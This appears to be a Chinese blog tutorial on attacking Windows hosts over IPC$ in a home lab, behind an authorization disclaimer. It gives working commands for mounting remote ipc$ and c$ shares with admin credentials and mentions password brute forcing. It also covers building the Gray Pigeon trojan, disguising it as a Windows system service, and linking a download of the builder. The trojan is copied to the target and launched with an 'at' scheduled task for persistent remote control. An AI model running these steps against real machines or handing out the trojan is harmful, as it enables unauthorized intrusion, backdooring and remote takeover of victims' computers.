渗透测试基础【01】——测试流程(IPC$)

渗透测试基础【01】——测试流程

注意,攻击对方需要对方授权,本文章目的只为教学,不要拿去干违法的事

1 渗透测试流程

  1. 授权(获取目标用户授权,否则是违法行为)
  2. 信息收集
nslookup   whois
  1. 扫描漏洞
nmap=ip范围	端口(80...) 服务器类型(IISApache) 什么类型的网站

高级扫描:

利用服务器本身漏洞
如IIS漏洞2003-IIS6.0 2008-IIS7.0, 网站漏洞

  1. 漏洞利用
  2. 提权(shell环境、桌面环境、最高权限)

shell环境的意思是拿到对方的命令行窗口,相当于你本地操作的是对方的命令行

  1. 消除入侵痕迹
  2. 留后门

可以留下一个木马或者其他,方便下次直接入侵

  1. 渗透测试报告

2 简单漏洞利用【IPC$】

Internet Process Connection(IPC)命名管道
此处我使用我本地win10的本机去破解虚拟机上的win7

手工测试端口号开放:

telnet IP地址 测试端口

telnet 192.168.145.98 445
  • 出现如下界面表明对方开启445端口(黑窗口)
    在这里插入图片描述

  • 如下界面表明对方未开启端口
    在这里插入图片描述

①scanport扫描445端口

②漏洞利用之IPC$

进行账户暴力破解:NTscan

net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del

# c$对应的是对方用户的c盘
net use f: \\10.1.1.2\c$ 密码 /user:用户
# ipc$对应是对方用户的所有盘
net use f: \\10.1.1.2\ipc$ 密码 /user:用户
  • 使用管理员运行cmd【win+r 然后ctrl+shift+enter】
net use \\192.168.145.98\ipc$ 123.com /user:administrator
# 123.com 密码(如果是空密码,直接输入""即可)
# administrator 账户

在这里插入图片描述

>f7可以查看cmd历史命令,esc退出查看
  • 查看是否映射成功
net use

渗透测试基础【01】——测试流程(IPC$)_第1张图片

③暴力破解系统密码(445端口)

过程省略…

④植入木马(留后门)

制作木马【灰鸽子软件】
链接:https://pan.baidu.com/s/1Za54jFQJyTkxDPDVKMQzAA?pwd=zj8k
提取码:zj8k

  • 配置服务器程序(木马)
    渗透测试基础【01】——测试流程(IPC$)_第2张图片
    渗透测试基础【01】——测试流程(IPC$)_第3张图片

启动项可以不用设置,保持默认也行,不过为了防止用户识别出密码,我们可以将名称改为windows system service等等【该服务会自动写到注册表并注册为服务】

在这里插入图片描述

copy d:\\heihei.exe \\192.168.145.30\c$

# copy heihei.exe \\192.168.145.98\d$
  • 结果:
    在这里插入图片描述

  • 虚拟机上也已经有对应文件了:

渗透测试基础【01】——测试流程(IPC$)_第4张图片

⑤设置计划任务、自动执行木马

  • 查看时间
# 查询目标机上对应时间,方便设置定时任务
net time \\192.168.145.98

渗透测试基础【01】——测试流程(IPC$)_第5张图片

  • 设置定时任务
at \\192.168.14530 15:00 "c:\heihei.exe"

渗透测试基础【01】——测试流程(IPC$)_第6张图片

  • 结果查看

在目标机器(win7)以管理员运行cmd,查看定时任务

at

渗透测试基础【01】——测试流程(IPC$)_第7张图片
⑥等待肉鸡上线

渗透测试基础【01】——测试流程(IPC$)_第8张图片
渗透测试基础【01】——测试流程(IPC$)_第9张图片

现在来到win7,win+R,输入services.msc,查看对应服务

渗透测试基础【01】——测试流程(IPC$)_第10张图片

服务成功注册!!!

资料:

①安装的win7没有管理员

WIN7家庭普通版没有“本地用户和组”项,不能通过“用计算机右键-管理”的方法开启超级管理员帐户Administrator。

要开启Win7家庭普通版本的超级管理员账户,你首先需要使用拥有管理员权限的账户登录系统,然后按照以下步骤操作:

1> 打开注册表:点击“开始”-> “运行” 在运行窗口中输入:regedit

2> 找到注册表项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\

3> 在上述注册表项下新建注册表项“SpecialAccounts”,再在其下新建子项“UserList”,然后新建一个名为“Administrator”的DWORD(32位)值,将其数值改成“1”

4> 激活administrator用户。重启计算机,按F8后进安全模式,在管理员权限下点击“开始”-> “运行” 在运行窗口中输入:cmd,在DOS窗口下输入:

复制代码代码如下:

net user administrator /active:yes

5> 重启计算机或切换用户,这时应该能看到超级管理员administrator用户,以administrator身份登陆即可,默认无密码!

②iso文件

  • 可以通过https://msdn.itellyou.cn/下载
    渗透测试基础【01】——测试流程(IPC$)_第11张图片
  • 百度网盘

链接:https://pan.baidu.com/s/1Ela-qgJ6sJQPtrMO5PzZRA?pwd=zj8k
提取码:zj8k

你可能感兴趣的:(Matrix,安全,服务器,网络,渗透,ipc攻击)